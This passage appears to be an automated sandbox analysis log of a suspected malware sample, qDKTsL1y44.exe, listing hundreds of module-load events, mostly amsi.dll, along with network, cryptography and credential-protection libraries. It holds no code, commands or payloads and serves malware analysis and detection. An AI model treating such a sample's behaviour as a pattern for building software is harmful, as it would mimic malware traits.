              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
